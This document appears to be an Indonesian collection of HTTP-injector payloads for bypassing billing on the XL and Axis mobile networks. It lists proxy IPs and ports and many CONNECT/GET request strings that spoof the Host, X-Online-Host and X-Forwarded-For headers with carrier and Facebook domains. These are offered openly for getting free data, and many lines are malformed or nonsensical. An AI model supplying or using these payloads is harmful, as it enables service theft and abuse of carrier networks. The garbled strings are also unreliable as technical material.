PAYLOAD AXIS & XL

" Create By Mas Boyy "

Proxy
Port=>
Xl 8080
=> 202.152.240.50
Proxy
Port=>8080
Axis => 10.8.3.8 & 128.199.150.25
CONNECT [host_port][crlf][crlf][split]GET http://123.xl.co.id/min_balance8/ HTTP
/1.1[crlf]Host: 123.xl.co.id/min_balance8[crlf]X-Forward-Host: 123.xl.co.id/min_
balance8[crlf]Connection: Keep-Alive[crlf]Content-Length: 202.152.240.50:8080[cr
lf][crlf]CONNECT [host_port][crlf][protocol][crlf]
CONNECT [host_port][crlf][split]GET http://123.xl.co.id/min_balance8.MY.XL.AXIAT
A/ HTTP/1.1[crlf]Host: 123.xl.co.id/min_balance8[crlf]X-Online-Host: 123.xl.co.i
d/min_balance8[crlf]X-Forward-Host: 123.xl.co.id/min_balance8[crlf]X-Forwarded-F
or: 123.xl.co.id/min_balance8[crlf]Connection: Keep-Alive[crlf]Content-Length: 9
999999999999[crlf]Set-Cookie: BIGipServeePool_my.CONNECT [host]: 433\r\n [split]
GET http://123.xl.co.id/min_balance8/HTTP/1.1[crlf] Host: tm.muslimku.com[crlf]
[netData][crlf][crlf]CONNECT [host_port][crlf][crlf][split]
CONNECT [host_port][crlf][crlf][split][crlf] POST http://123.xl.co.id/min_balanc
e8/ HTTP/1.1 200 OK[crlf]GET http://123.xl.co.id/min_balance8/ HTTP/1.1 200 OK[c
rlf] Host: http://global-4-lvs.opera-mini.net[crlf]Connection: Keep-Alive[crlf]C
ontent-Length:9999999999999999999999999999999999[crlf]Content-Type: text/html/ap
plication/octet-stream; charset=us-ascii[crlf][crlf][instant_split] CONNECT: SSH
/AUTH_PASS/[crlf]+(opsional)+PING: 8.26.56.26:8.20.247.20/DNS/Connection: Fullsp
eed&Keep-Alive Maximum Speed: 1 GBps[crlf] Proxy-Connection: Keep-Alive[crlf]
Keep-Alive: 1[crlf][crlf] Type: MOBILE HSPA[crlf] state: CONNECTED[crlf] Reason:
Connected Network[crlf][crlf]X-Android-Response-Source: NETWORK 200[crlf][crlf]
CONNECT [host_port][crlf][crlf]CONNECT [host_port][crlf]Host: axisworld.co.id[cr
lf]Connection: keep-alive[crlf]Content-Length: 999999999999999999999[crlf][crlf]
CONNECT [host_port]\r\n [split]GET http://123.xl.co.id/min_balance7/9.MY.AXIATA.
COM\r\n HTTP/1.1 X SQUAD NEWBI INDONESIA\r\n Content-Type:text/html; charset=UTF
-8;q=0.7,*;q=0.7\r\nContent-Length:X SQUAD NEWBI INDONESIA\r\nLocation:http://12
3.xl.co.id/min_balance7.MY.AXIATA.COM\r\nConnection:Close\r\n\r\n<html><head><ti
tle> HTTP Inj </title><head><body><h1>Crosser ciomas !!</h1><p>"sabiel29" <a hre
f="http://123.xl.co.id/min_balance7.MY.AXIATA.COM">here</a></p></body></html>Hos
t: 123.xl.co.id/min_balance7.MY.AXIATA.COM\r\n\Connection: keep-Alive\r\n\r\n
[raw][crlf][split]GET http://line.naver.jp/ HTTP/1.1[crlf]Host: line.naver.jp[cr
lf]Connection: Keep-Alive[crlf]User-Agent: [ua][crlf][crlf]
CONNECT [host_port] [crlf][crlf][split]GET http://123.xl.co.id/min_balance7/ HTT
P/1.1[crlf]Host:123.xl.co.id[crlf]Connection: Kep-Alive[crlf]Content-Length: 777
777[crlf][crlf]
GET http://m.facebook.com/free/Strict-Transport-Security:max-age=15552000; prelo
adCache-Control:private, no-cache, no-store, must-revalidateExpires:Sat, 01 Jan
2000 00:00:00 GMTAccess-Control-Allow-Credentials:trueX-Frame-Options:DENYConten
t-Type:application/xhtml+xml; charset=utf-8X-Content-Type-Options:nosniffPragma:
no-cacheVary:Accept-EncodingAccess-Control-Allow-Origin:https://m.facebook.comAc
cess-Control-Expose-Headers:X-FB-Debug, X-Loader-Lengthaccess-control-allow-meth
od:OPTIONSX-XSS-Protection:0X-FB-Debug:l3zQifIpQzVrozu/wDMsCGH9sM2JFHsNYc8z52DWG
IID2QAP4KQ/NaipdZnzfN9BUE+moEu0fYQbNfHQmF0NbQ==Date:Fri, 11 Nov 2016 13:59:04 GM
TConnection:close/ HTTP/1.1[crlf]Host:api.facebook.com[crlf]X-Forwarded-For:api.
facebook.com[crlf]Connection: Keep-Alive[lf][crlf][split]CONNECT [host_port] [pr
otocol][crlf][crlf]
CONNECT [host_port][cr][crlf] @http://internet-server.facebook.net[split]GET [ro
tate=http://123.xl.co.id/min_balance77/scontent-sea1-1.xx.fbcdn.net/xl.oi.co.id/
mmsc.xl.net.id]/ HTTP/1.1/[cr][crlf] Host:[rotate=123.xl.co.id/favicon.ico/123pr
oxy.eu]Connection: Keep-Alive\r\nContent-Length: Mozilla/5.0 (Linux,Android 5.1;
A74A Build/LMY47D) AppleWebKit/537.36 KHTML, like Gecko) Version/4.0 Chrome/39.
0.0.0 Mobile Safari 537.360[crlf]Accept-Language: id-ID,en-US;q-0.8 Location:min
_balanced4/mmc.xl.net.id/ \r\nHost:min_balanced4/mmc.xl.net.id\r\nTrueContent-Le
ngth: 999999999[crlf]CONNECT [crlf]GET [rotate=123.xl.co.id/min_balance77/sconte
nt-sea1-1.xx.fbcdn.net/mmc.xl.net.id][crlf][crlf]
CONNECT [host_port] [crlf][crlf][split]GET 123.xl.co.id/min_balance7/ HTTP/1.1 2
00 OK [crlf]Host: 123.xl.co.id/mid_balance7 [crlf]Connection: Keep-Alive[crlf]Co
ntent-Length: 999999999999999999999[crlf][crlf]
[split]CONNECT [host_port] [crlf][crlf][split]POST 123.xl.co.id/min_balance7/ HT
TP/1.1 200 OK [crlf]Host: 123.xl.co.id/mid_balance7 [crlf]Connection: Keep-Alive
[crlf]Content-Length: 999999999999999999999[crlf][crlf]
[split]CONNECT [host_port] [crlf][crlf][split]GET 123.xl.co.id/min_balance7/ HTT
P/1.1 200 OK [crlf]Host: 123.xl.co.id/mid_balance7 [crlf]Connection: Keep-Alive[
crlf]Content-Length: 99999999999999999999999999999999999999999999999999999999999
99999999999999999999999999999999999999999999999999999999999999999999999999999999
99999999999999999999999999999999999999999999999999999999999999999999999999999[cr
lf][crlf]
CONNECT [host_port][crlf][crlf][split]GET http://mmc.xl.net.id/ HTTP/1.1[crlf]Ho
st: mmc.xl.net.id[crlf]Connection: Keep-Alive[crlf][crlf]

CONNECT [host_port] [crlf][crlf][split]GET http://[rotate=123.xl.co.id/min_balan

ce7;axisnet.net;axisnet.jp;mmc.xl.net.id;axisnet.biz;axiswap.net;app.axisworld.c
o.id]/ HTTP/1.1[crlf]Host: [rotate=123.xl.co.id/min_balance7;axisnet.net;axisnet
.jp;mmc.xl.net.id;axisnet.biz;axiswap.net;app.axisworld.co.id][crlf]X-Forward-Ho
st: [rotate=123.xl.co.id/min_balance7;axisnet.net;axisnet.jp;mmc.xl.net.id;axisn
et.biz;axiswap.net;app.axisworld.co.id][crlf]X-Forwarded-For: [rotate=123.xl.co.
id/min_balance7;axisnet.net;axisnet.jp;mmc.xl.net.id;axisnet.biz;axiswap.net;app
.axisworld.co.id][crlf]Connection: Keep-Alive[crlf]CONNECT [host_port] [protocol
][crlf][crlf]
CONNECT 128.199.86.3[lf]188.166.211.221[lf]188.166.238.52:443[lf]22[lf]80[crlf][
protocol][crlf][delay_split]GET http://123.xl.co.id/min_balance8/thankyou.php?ms
g=failed/ HTTP/1.1[crlf]Host: 128.199.86.3[lf]188.166.211.221[lf]188.166.238.52[
crlf]X-Forward-Host: 192.168.50.60[crlf]Proxy-Connection: Keep-Alive[crlf]User-A
gent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; SM-J110G Bui ld/KTU84P)\r\n\r\nUser
-Agent: Web-sniffer/1.1.0 (+http://web-sniffer.net/)\r\n\nAccept-Encoding: gzip\
r\n\nAccept-Charset: ISO-8859-1,UTF-8;q=0.7,*;q=0.7\r\n\nCache-Control: no-cache
\r\n\nAccept-Language: de,en;q=0.7,en-us;q=0.3\r\n\nReferer: http://web-sniffer.
net/[crlf]Content-Length: 111111111[crlf]Full-Speed: Maximal kb/s[crlf]Ping 8.8.
8.8 -t[crlf]Ping m.facebook.com[crlf]PING:8.26.56.26:8.20.247.20/DNS/Connection:
Fullspeed&keep-Alive[crlf][crlf]
CONNECT [host_port][crlf][protocol][crlf][delay_split]GET http://123.xl.co.id/mi
n_balance8/thankyou.php?msg=failed/ HTTP/1.1[crlf]X-Forward-Host: 192.168.50.60[
crlf]Proxy-Connection: Keep-Alive[crlf]User-Agent: Dalvik/1.6.0 (Linux; U; Andro
id 4.4.4; SM-J110G Bui ld/KTU84P)\r\n\r\nUser-Agent: Web-sniffer/1.1.0 (+http://
web-sniffer.net/)\r\n\nAccept-Encoding: gzip\r\n\nAccept-Charset: ISO-8859-1,UTF
-8;q=0.7,*;q=0.7\r\n\nCache-Control: no-cache\r\n\nAccept-Language: de,en;q=0.7,
en-us;q=0.3\r\n\nReferer: http://web-sniffer.net/[crlf]Content-Length: 111111111
[crlf]Full-Speed: Maximal kb/s[crlf]Ping 8.8.8.8 -t[crlf]Ping m.facebook.com[crl
f]PING:8.26.56.26:8.20.247.20/DNS/Connection: Fullspeed&keep-Alive[crlf][crlf]

Semoga Bermanfaat
Salam GRETONGERS